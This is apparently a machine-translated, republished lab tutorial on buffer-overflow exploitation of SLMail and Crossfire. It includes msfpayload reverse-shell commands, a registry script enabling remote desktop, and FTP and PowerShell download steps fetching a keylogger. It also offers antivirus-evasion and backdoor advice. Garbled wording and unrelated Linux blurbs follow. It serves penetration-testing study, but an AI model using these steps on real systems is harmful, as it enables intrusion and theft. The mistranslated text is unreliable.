


Linux Penetration Testing Tutorial: Teach you step-by-step on stack overflow from getting started to giving up
The content of the notes refers to the KaliLinux penetration testing tutorial by Teacher Yuan Fanghong of the Security Niu Classroom
The crux of all vulnerabilities comes from the input of data. The principle of buffer overflow is that the boundary between data and code is blurred. When the buffer boundary limit is not strict, the buffer will be damaged due to malformed data passed into the variable or program operation error. "Extremely violent", thereby covering the data in adjacent video memory areas, successfully changing the video memory data, which can lead to process kidnapping, execution of malicious code, and acquisition of server control.
To better understand the principle of buffer overflow, please refer to the article reprinted by the author:
Teach you step by step about stack overflow from getting started to giving up (Part 1)
Teach you step by step about stack overflow from getting started to giving up (Part 2)
Article Directory
1. Ways to discover vulnerabilities (1) Source code audit
Software developers may use social engineering and other methods to obtain the source code for review and debugging. The conditions are strict and the source code is usually unavailable.
(2) Reverse Engineering (ReverseEngineering)
Use reverse engineering to obtain assembly source code for analysis. Assembly code analysis requires a large workload and is difficult.
(3) Fuzzing
is a way to discover software vulnerabilities by providing unexpected input to the target system and monitoring abnormal results. Generally, a valid input and random deviation are used to complete this, and software debugging tools (such as: ImmunityDebugger).
2. Fuzz testing process
First of all, we need to understand some security protection technologies for buffer overflow, because this protection mechanism needs to be avoided during the fuzz testing process.
(1)Windows
The test software is 'SLMail5.5.0MailServer', and its PASS command has a buffer overflow vulnerability. Basic idea: (Use ImmunityDebugger as debugging tool)
1. Use a python script to test whether the PASS command will overflow when it receives a large amount of data. Usually, if there is no overflow after 3000 characters, it means there should be no overflow vulnerability.
2. After discovering the overflow vulnerability, determine the address corresponding to the EIP. The basic methods are: binary method and unique string method. The unique string method can be generated with the metasploit script usr/share/metasploit-framework/tools/pattern_create.rb3000.
3. Change the EIP to the video memory address corresponding to the Shellcode, write the Shellcode to the address space, the program reads the EIP register value, jumps to the shellcode code segment and executes it.
4. Through the debugging tool, we found that after the sent data fills the EIP, it will then fill the space pointed to by ESP, so we put the Shellcode at the location of ESP.
5. Determine the distance from the ESP address to the bottom of the stack Linux anti-buffer overflow, that is, the size of the Shellcode that can be stored. Use a python script to send data to the software for testing, and debug the software to see how much data is stored in the space pointed to by the ESP. The memory space view of modern computer system processes is shown in the figure:
Figure 1 Process memory space view
6. Due to the ASLR mechanism, the address of the function call stack changes randomly every time the software runs, so hard coding is not feasible. The alternative is to find the system module with a fixed address in the video memory, and find the address jump of the JMPESP instruction in the module. Then this command directly jumps to ESP, and then executes the shellcode. Use the mona.py script to identify the video memory module. Search for the module where "returnaddress" is the JMPESP command and find the system module that is not protected by DEP and ASLR mechanisms!monamodules. With the help of /usr/share/metasploit-framework/tools/nasm_shell.rb converts the assembly instruction jmpesp to two's complement to FFE4, and searches for the FFE4 instruction in the module!monafind-s "xffxe4"-mslmfc.dll. After finding the address of the instruction, Fill in the address into the EIPlinux version of qq, construct the Shellcode, and remove bad characters: /msfpayloadwin32_reverseLHOST=192.168.20.8LPORT=443R|./msfencode-b"x00x0ax0d
Note: The payload selected when constructing the Shellcode is a reverse connection instead of a direct connection to bind. This can avoid the blocking strategy of the firewall.
7. Finally, enable port eavesdropping nc-vlp443. After the Shellcode is executed, exit the entire process using the ExitProcess method, which will cause the SMS service to crash. Slmail is a thread-based application. Applying the ExitThread method can prevent the entire service from crashing and achieve duplication. Overflow:/msfpayloadwin32_reverseLHOST=192.168.20.8EXITFUNC=threadLPORT=443R|./msfencode-b"x00x0ax0d"
Note: Different types of programs, protocols, and vulnerabilities will consider individual characters to be bad characters. Those characters have fixed uses, so bad characters cannot appear in the return address, Shellcode, or buffer. Send 0x00-0xff256 characters and find all bad characters. Bad characters can be encoded with the help of metasploit script ./msfencode.
8. If you want to further control the attack target, you can open the remote desktop by changing the registry. More than 90% of the configurations in Windows can be completed by changing the registry:
<span class="token function">echo</span> Windows Registry Editor Version 5<span class="token punctuation">.</span>00>3389<span class="token punctuation">.</span>reg <span class="token function">echo</span> <span class="token namespace">[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]</span>>>3389<span class="token punctuation">.</span>reg <span class="token function">echo</span> <span class="token string">"fDenyTSConnections"</span>=dword:00000000>>3389<span class="token punctuation">.</span>reg <span class="token function">echo</span> <span class="token namespace">[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp]</span>>>3389<span class="token punctuation">.</span>reg <span class="token function">echo</span> <span class="token string">"PortNumber"</span>=dword:00000d3d>>3389<span class="token punctuation">.</span>reg <span class="token function">echo</span> <span class="token namespace">[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]</span>>>3389<span class="token punctuation">.</span>reg <span class="token function">echo</span> <span class="token string">"PortNumber"</span>=dword:00000d3d>>3389<span class="token punctuation">.</span>reg regedit <span class="token operator">/</span>s 3389<span class="token punctuation">.</span>reg
(2)Linux
The test software is 'Crossfire', and 1.9.0 has a buffer overflow vulnerability when accepting inbound socket connections. The basic idea is the same as Windows Fuzzing (edb is used as debugging tool), so I won’t go into details. You need to pay attention to the following points:
1. Debug command: edb--run/usr/games/crossfire/bin/crossfire
2. When verifying the buffer overflow, we found that only when the payload is fixed at 4368 bytes, the value of EIP can be accurately covered. In this way, the space pointed to by ESP only has 7 bytes left, which is not enough to put down the Shellcode, so we searched it in edb. The register that can be completely covered by data finds EAX, so as a workaround, ESP jumps to EAX to execute Shellcode.
3. Select and change EXP
There are help codes (EXP) for various software vulnerabilities that have been published for a long time on the Internet. We can choose a trustworthy EXP source and conduct research or changes on this basis, especially Shellcode cannot easily use linux anti-buffer Overflow may contain viruses. When using Linux systems, programming languages that need to be mastered generally include Python, C, C, Ruby, etc. Several reliable EXP sources:
After receiving EXP, you need to pay attention to the following points:
4. Post-vulnerability stage
Includes further operations such as uploading tools, elevating privileges, erasing attack traces, and installing side doors. Only file upload operations are discussed here. File upload is the basis for pre-installing Trojans and installing side doors. It is mainly based on the obtained information about the target operating system. shell, perform file upload operations.
(一)Windows
首先须要了解,用nc侦听端口取得的shell是非交互shell,这样在一些须要交互的环境操作受限,例如tab难以手动补全、一些参数难以交互输入等,所以须要上传其他的远控程序,如灰肉鸽。这儿主要讨论怎样上传这种远控程序:
1.Linux端:配置ftp服务
登陆FTP有三种形式:
<span class="token function">apt-get</span> <span class="token function">install</span> vsftpd <span class="token comment">#Linux中ftp服务有很多,这里使用vsftpd</span> vim /etc/vsftpd/vsftpd.conf<span class="token comment">#配置vsftpd服务,这里采用系统用户登录的方式</span> <span class="token comment">#添加配置</span> local_root<span class="token operator">=</span>/home/ftpduser/ <span class="token comment">#系统用户登录后的主目录</span> <span class="token comment">#可以设置用户独立配置文件保存目录:user_config_dir=/etc/vsftpd/ftpduser_config/ </span> <span class="token comment">#对特定的用户ftpuser1可以单独进行配置,方法是在user_config_dir指定的目录下建立ftpuser1文件(和用户名相同的文件),然后在其中写上配置内容</span> chroot_local_user<span class="token operator">=</span>YES <span class="token comment">#该值为YES时,所有用户只能限制在其主目录下访问</span> chroot_list_enable<span class="token operator">=</span>NO<span class="token comment">#该值为YES时,其中的用户即为与chroot_list_file中相例外的用户;为NO时,没有例外的用户。</span> chroot_list_file<span class="token operator">=</span>/etc/vsftpd.chroot_list <span class="token comment">#如chroot_local_user=NO,chroot_list_enable=YES,此时所有用户都可以访问任何目录,而chroot_list_file中的用户只能访问其主目录</span> userlist_deny<span class="token operator">=</span>NO <span class="token comment">#该值为YES时,/etc/vsftpd/user_list文件中指定的用户不能访问FTP服务器;值为NO时,则仅允许指定的用户访问FTP服务器</span> userlist_enable<span class="token operator">=</span>YES<span class="token comment">#/etc/vsftpd/user_list文件有效</span> <span class="token keyword">echo</span> ftpduser1 <span class="token operator">>></span> /etc/vsftpd/user_list<span class="token comment">#这个文件禁止或允许使用vsftpd的用户列表文件</span> <span class="token comment">#!!注意user_list文件中的用户列表和ftpusers不同,ftpusers不受任何配制项的影响,它是一个黑名单,总是有效</span> <span class="token function">mkdir</span> /home/ftpduser <span class="token function">useradd</span> -d /home/ftpduser/ftpuser1 -s /sbin/nologin ftpduser1 <span class="token function">service</span> vsftpd start
2.Windows端:因为系统缺乏预装的下载工具,所以须要自行配置
(1)使用ftp传输文件
由于非交互shell未能登入ftp服务,所以编撰ftp配置脚本。
<span class="token function">echo</span> open 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>1<span class="token punctuation">.</span>2 21>ftp<span class="token punctuation">.</span>txt <span class="token function">echo</span> ftpduser1>>ftp<span class="token punctuation">.</span>txt <span class="token function">echo</span> passw0rd>>ftp<span class="token punctuation">.</span>txt <span class="token function">echo</span> bin>>ftp<span class="token punctuation">.</span>txt <span class="token function">echo</span> GET whoami<span class="token punctuation">.</span>exe>>ftp<span class="token punctuation">.</span>txt <span class="token function">echo</span> GET klogger<span class="token punctuation">.</span>exe>>ftp<span class="token punctuation">.</span>txt <span class="token function">echo</span> bye>>ftp<span class="token punctuation">.</span>txt ftp <span class="token operator">-</span>s:ftp<span class="token punctuation">.</span>txt
(2)使用powershell传输文件
<span class="token function">echo</span> <span class="token variable">$storageDir</span> = <span class="token variable">$pwd</span> <span class="token variable">$webclient</span> = <span class="token function">New-Object</span> System<span class="token punctuation">.</span>Net<span class="token punctuation">.</span>WebClient <span class="token variable">$url</span> = <span class="token string">"http://192.168.1.2/whoami.exe"</span> <span class="token variable">$file</span> = <span class="token string">"new-exploit.exe"</span> <span class="token variable">$webclient</span><span class="token punctuation">.</span>DownloadFile<span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">.</span><span class="token variable">$file</span><span class="token punctuation">)</span> powershell<span class="token punctuation">.</span>exe <span class="token operator">-</span>ExecutionPolicy Bypass <span class="token operator">-</span>Nologo <span class="token operator">-</span>NonInteractive <span class="token operator">-</span>Noprofile <span class="token operator">-</span>File wget<span class="token punctuation">.</span>ps1
(二)Linux
借助netcat、curl、wget等系统自带的工具上传文件,比较容易实现,不再赘言。
注意:上传的文件要防止被目标系统杀毒软件去除,尽量使用合法的远程控制软件,如nc。
The above is the detailed content of Linux Penetration Testing Tutorial: Teach you step-by-step on stack overflow from getting started to giving up. For more information, please follow other related articles on the PHP Chinese website!

The main tasks of Linux system administrators include system monitoring and performance tuning, user management, software package management, security management and backup, troubleshooting and resolution, performance optimization and best practices. 1. Use top, htop and other tools to monitor system performance and tune it. 2. Manage user accounts and permissions through useradd commands and other commands. 3. Use apt and yum to manage software packages to ensure system updates and security. 4. Configure a firewall, monitor logs, and perform data backup to ensure system security. 5. Troubleshoot and resolve through log analysis and tool use. 6. Optimize kernel parameters and application configuration, and follow best practices to improve system performance and stability.

Learning Linux is not difficult. 1.Linux is an open source operating system based on Unix and is widely used in servers, embedded systems and personal computers. 2. Understanding file system and permission management is the key. The file system is hierarchical, and permissions include reading, writing and execution. 3. Package management systems such as apt and dnf make software management convenient. 4. Process management is implemented through ps and top commands. 5. Start learning from basic commands such as mkdir, cd, touch and nano, and then try advanced usage such as shell scripts and text processing. 6. Common errors such as permission problems can be solved through sudo and chmod. 7. Performance optimization suggestions include using htop to monitor resources, cleaning unnecessary files, and using sy

The average annual salary of Linux administrators is $75,000 to $95,000 in the United States and €40,000 to €60,000 in Europe. To increase salary, you can: 1. Continuously learn new technologies, such as cloud computing and container technology; 2. Accumulate project experience and establish Portfolio; 3. Establish a professional network and expand your network.

The main uses of Linux include: 1. Server operating system, 2. Embedded system, 3. Desktop operating system, 4. Development and testing environment. Linux excels in these areas, providing stability, security and efficient development tools.

The Internet does not rely on a single operating system, but Linux plays an important role in it. Linux is widely used in servers and network devices and is popular for its stability, security and scalability.

The core of the Linux operating system is its command line interface, which can perform various operations through the command line. 1. File and directory operations use ls, cd, mkdir, rm and other commands to manage files and directories. 2. User and permission management ensures system security and resource allocation through useradd, passwd, chmod and other commands. 3. Process management uses ps, kill and other commands to monitor and control system processes. 4. Network operations include ping, ifconfig, ssh and other commands to configure and manage network connections. 5. System monitoring and maintenance use commands such as top, df, du to understand the system's operating status and resource usage.

Introduction Linux is a powerful operating system favored by developers, system administrators, and power users due to its flexibility and efficiency. However, frequently using long and complex commands can be tedious and er

Linux is suitable for servers, development environments, and embedded systems. 1. As a server operating system, Linux is stable and efficient, and is often used to deploy high-concurrency applications. 2. As a development environment, Linux provides efficient command line tools and package management systems to improve development efficiency. 3. In embedded systems, Linux is lightweight and customizable, suitable for environments with limited resources.


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

SublimeText3 Linux new version
SublimeText3 Linux latest version

Dreamweaver Mac version
Visual web development tools

ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment

SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.

SublimeText3 Mac version
God-level code editing software (SublimeText3)